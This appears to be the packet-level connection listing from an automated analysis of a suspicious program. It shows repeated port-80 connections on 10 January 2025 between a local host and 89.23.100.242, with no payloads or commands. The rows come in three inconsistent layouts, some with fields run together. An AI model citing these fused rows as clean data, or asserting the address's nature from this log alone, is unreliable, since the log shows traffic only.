Jan 10, 2025 07:57:33.496718884 CET | 49738 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:33.500993967 CET | 80 | 49739 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:33.681040049 CET | 49740 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:33.686196089 CET | 80 | 49740 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:33.686275959 CET | 49740 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:33.686378002 CET | 49740 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:33.691236973 CET | 80 | 49740 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:33.845182896 CET | 49739 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:33.850301981 CET | 80 | 49739 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:33.850474119 CET | 80 | 49739 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:34.032778978 CET | 49740 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:34.038023949 CET | 80 | 49740 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:34.038042068 CET | 80 | 49740 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:34.038057089 CET | 80 | 49740 | 89.23.100.242 | 192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.259073019 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.314184904 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.394682884 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.436712027 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.450289965 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.586520910 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.586594105 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.835117102 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.835201979 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.835544109 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.840451956 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.840470076 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.840483904 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.840497017 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.840539932 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.840565920 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.840650082 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.845508099 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.189908981 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.195075035 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.195116043 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.195147991 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.573590040 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.606478930 CET4973880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.689012051 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.725929022 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.860882044 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.938079119 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.939111948 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.943185091 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.943334103 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.943367958 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.944317102 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.944376945 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.948178053 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.298312902 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:36.303397894 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.303416967 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.303431034 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.700068951 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.833344936 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.833797932 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.408490896 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.408701897 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.413547993 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:39.413657904 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.413717985 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:39.413741112 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.413777113 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.418613911 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:39.767108917 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.772176027 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:39.772222042 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.175774097 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.309935093 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.310460091 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.425162077 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.748334885 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.748768091 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.753549099 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.753618002 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.753726006 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.753796101 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.753892899 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.758770943 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:41.111181974 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:41.116415977 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:41.116453886 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:41.116482973 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:41.504169941 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:41.656285048 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:41.659218073 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:42.106889009 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:42.112303972 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:42.112361908 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:42.181252003 CET4974880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:42.188072920 CET804974889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:42.188149929 CET4974880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:42.188240051 CET4974880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:42.194881916 CET804974889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:42.532938004 CET4974880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:42.538995981 CET804974889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:42.539012909 CET804974889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:42.539026976 CET804974889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:42.925580978 CET804974889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:43.019200087 CET4974880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:43.052711010 CET804974889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:43.204710960 CET4974880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:44.021030903 CET4974880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:44.021331072 CET4975080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:44.026216030 CET804975089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:44.026256084 CET804974889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:44.026289940 CET4975080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:44.026335955 CET4974880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:44.026431084 CET4975080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:44.031275988 CET804975089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:44.376519918 CET4975080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:44.381730080 CET804975089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:44.381767035 CET804975089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:44.381794930 CET804975089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:44.793194056 CET804975089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:44.945664883 CET804975089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:44.949732065 CET4975080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.126107931 CET4975080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.131244898 CET804975089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.131716967 CET4975080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.154113054 CET4975280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.159055948 CET804975289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.159868956 CET4975280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.160131931 CET4975280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.164979935 CET804975289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.318916082 CET4975380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.323965073 CET804975389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.324095964 CET4975380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.325611115 CET4975380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.330569983 CET804975389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.338794947 CET4975280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.390168905 CET804975289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.480540991 CET4975480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.485636950 CET804975489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.485970974 CET4975480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.486416101 CET4975480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.491255045 CET804975489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.667525053 CET804975289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.667717934 CET4975280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.673350096 CET4975380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.678389072 CET804975389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.678404093 CET804975389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.855304956 CET4975480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:45.860667944 CET804975489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.860699892 CET804975489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:45.860727072 CET804975489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:46.060854912 CET804975389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:46.204541922 CET4975380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:46.213042021 CET804975389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:46.222455978 CET804975489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:46.313926935 CET4975380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:46.314240932 CET4975480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:46.356924057 CET804975489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:46.505152941 CET4975480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:47.809942961 CET4975380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:47.810132027 CET4975480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:47.810403109 CET4975580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:47.815177917 CET804975389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:47.815198898 CET804975589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:47.815241098 CET4975380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:47.815283060 CET4975580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:47.815376997 CET804975489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:47.815390110 CET4975580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:47.815428972 CET4975480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:47.820195913 CET804975589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:48.173391104 CET4975580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:48.178677082 CET804975589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:48.178714991 CET804975589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:48.178742886 CET804975589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:48.556001902 CET804975589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:48.673284054 CET4975580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:48.685468912 CET804975589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:48.814802885 CET4975580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:48.815211058 CET4975680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:48.819983959 CET804975589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:48.820053101 CET4975580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:48.820173979 CET804975689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:48.820255041 CET4975680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:48.820349932 CET4975680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:48.825186014 CET804975689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:49.173388004 CET4975680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:49.178735971 CET804975689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:49.178775072 CET804975689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:49.178807974 CET804975689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:49.563672066 CET804975689.23.100.242192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jan 10, 2025 07:57:49.609119892 CET  49756        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:49.711436987 CET  49756        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:49.711898088 CET  49757        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:49.716696024 CET  80           49756      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:49.716767073 CET  49756        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:49.716851950 CET  80           49757      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:49.716969013 CET  49757        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:49.717104912 CET  49757        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:49.721939087 CET  80           49757      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:50.067127943 CET  49757        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:50.072397947 CET  80           49757      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:50.072441101 CET  80           49757      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:50.072470903 CET  80           49757      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:50.463190079 CET  80           49757      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:50.590858936 CET  80           49757      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:50.593066931 CET  49757        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:50.718743086 CET  49757        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:50.718748093 CET  49758        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:50.723781109 CET  80           49758      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:50.723968983 CET  80           49757      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:50.723982096 CET  49758        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:50.724101067 CET  49758        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:50.724101067 CET  49757        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:50.728988886 CET  80           49758      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.079622030 CET  49758        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.084733009 CET  80           49758      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.084777117 CET  80           49758      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.084805965 CET  80           49758      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.221288919 CET  49759        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.226480007 CET  80           49759      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.226550102 CET  49759        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.226663113 CET  49759        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.231601954 CET  80           49759      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.248112917 CET  49758        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.253494978 CET  80           49758      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.253556967 CET  49758        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.378345013 CET  49760        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.383476019 CET  80           49760      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.383590937 CET  49760        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.383697987 CET  49760        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.388525963 CET  80           49760      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.579586983 CET  49759        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.584790945 CET  80           49759      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.584834099 CET  80           49759      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.736162901 CET  49760        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:51.741314888 CET  80           49760      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.741353035 CET  80           49760      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.741379976 CET  80           49760      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:51.993340015 CET  80           49759      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.110790968 CET  49759        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.125248909 CET  80           49760      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.278945923 CET  80           49760      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.279381990 CET  49760        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.403476954 CET  49759        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.403682947 CET  49760        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.404045105 CET  49761        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.408821106 CET  80           49759      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.408986092 CET  80           49761      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.409013033 CET  49759        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.409058094 CET  80           49760      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.409138918 CET  49761        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.409205914 CET  49760        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.411108971 CET  49761        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.415971994 CET  80           49761      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.767134905 CET  49761        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:52.772556067 CET  80           49761      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.772593975 CET  80           49761      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:52.772623062 CET  80           49761      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:53.150372982 CET  80           49761      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:53.267174006 CET  49761        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:53.277571917 CET  80           49761      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:53.465373993 CET  49761        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:53.466018915 CET  49762        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:53.470618963 CET  80           49761      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:53.470711946 CET  49761        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:53.470817089 CET  80           49762      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:53.472110033 CET  49762        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:53.472232103 CET  49762        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:53.477045059 CET  80           49762      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:53.829628944 CET  49762        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:53.834960938 CET  80           49762      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:53.835040092 CET  80           49762      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:53.835068941 CET  80           49762      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.220063925 CET  80           49762      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.271169901 CET  49762        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.350802898 CET  80           49762      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.470185041 CET  49762        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.517179012 CET  49762        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.517318964 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.522327900 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.522454977 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.522481918 CET  80           49762      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.522531033 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.522593975 CET  49762        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.527442932 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.541660070 CET  49764        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.546583891 CET  80           49764      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.547162056 CET  49764        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.547162056 CET  49764        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.552056074 CET  80           49764      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.876604080 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.881822109 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.881859064 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.881894112 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.881923914 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.881937981 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.881951094 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.881985903 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.881988049 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.882014990 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.882024050 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.882047892 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.882052898 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.882074118 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.882085085 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.882107019 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.882107973 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.882143974 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.882251024 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.887059927 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.887088060 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.887116909 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.887125015 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.887154102 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.887166023 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.887175083 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.887193918 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.887221098 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.887243986 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.887274027 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.887300014 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.892357111 CET  49764        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.897243023 CET  80           49764      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.897386074 CET  80           49764      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.897413969 CET  80           49764      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.934107065 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.934695005 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:54.982032061 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:54.982091904 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.033983946 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.034033060 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.037204981 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.037348032 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.038955927 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.038999081 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042284966 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042334080 CET  49763        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:57:55.042341948 CET  80           49763      89.23.100.242  192.168.2.4
Jan 10, 2025 07:57:55.042392015 CET  49763        80         192.168.2.4    89.23.100.242
